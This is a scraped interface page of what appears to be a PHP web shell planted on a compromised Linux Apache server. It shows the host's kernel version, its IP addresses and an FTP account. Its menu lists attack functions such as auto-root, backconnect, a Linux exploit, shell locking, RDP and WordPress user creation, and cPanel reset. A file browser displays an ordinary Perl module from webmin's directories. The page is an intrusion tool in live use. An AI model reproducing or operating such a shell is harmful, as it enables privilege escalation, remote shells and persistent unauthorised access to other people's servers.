Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
vendor_perl /
Moo /
[ HOME SHELL ]
Name
Size
Permission
Action
HandleMoose
[ DIR ]
drwxr-xr-x
HandleMoose.pm
7.69
KB
-rw-r--r--
Object.pm
1.9
KB
-rw-r--r--
Role.pm
13.09
KB
-rw-r--r--
_Utils.pm
6.38
KB
-rw-r--r--
sification.pm
740
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sification.pm
package Moo::sification; use strict; use warnings; no warnings 'once'; use Carp qw(croak); BEGIN { our @CARP_NOT = qw(Moo::HandleMoose) } use Moo::_Utils qw(_in_global_destruction); sub unimport { croak "Can't disable Moo::sification after inflation has been done" if $Moo::HandleMoose::SETUP_DONE; our $disabled = 1; } sub Moo::HandleMoose::AuthorityHack::DESTROY { unless (our $disabled or _in_global_destruction) { require Moo::HandleMoose; Moo::HandleMoose->import; } } sub import { return if our $setup_done; if ($INC{"Moose.pm"}) { require Moo::HandleMoose; Moo::HandleMoose->import; } else { $Moose::AUTHORITY = bless({}, 'Moo::HandleMoose::AuthorityHack'); } $setup_done = 1; } 1;
Close